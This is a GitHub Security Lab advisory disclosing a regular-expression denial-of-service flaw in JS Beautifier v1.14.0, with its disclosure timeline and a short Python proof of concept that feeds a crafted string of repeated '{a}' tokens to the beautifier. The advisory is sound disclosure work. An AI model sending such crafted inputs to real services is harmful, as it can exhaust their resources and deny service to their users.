GHSL-2021-113: ReDoS (Regular Expression Denial of Service) in JS Beautifier

Coordinated Disclosure Timeline

• 2021-08-31: Sent report to bitwiseman@beautifier.io
• 2021-10-14: They have code scanning enabled, so this bug is listed in their code scanning results.
• 2021-10-14: Sent a follow-up email to bitwiseman@beautifier.io with my suggested fix.
• 2021-11-30: Disclosure deadline expired.
• 2021-12-06: Created a pull request to fix the bug, but it turned out that my fix was incorrect.
• 2021-12-09: Created a new pull request to fix the bug, which was successful.

Summary

JS Beautifier contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).

Product

JS Beautifier

Tested Version

v1.14.0

Details

ReDoS

ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions which can perform extremely badly when run on a crafted input string.

This vulnerability was found using a CodeQL query which identifies inefficient regular expressions.

Vulnerability

The vulnerable regular expression is here.

Please follow these steps to reproduce the issue:

• Install jsbeautifier: pip3 install jsbeautifier
• Run the below with python3:

import jsbeautifier

str = '''
return <- {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {a} {>
'''

print(jsbeautifier.beautify(str, {'e4x': True}))

Impact

This issue may lead to a denial of service.

Credit

This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-113 in any communication regarding this issue.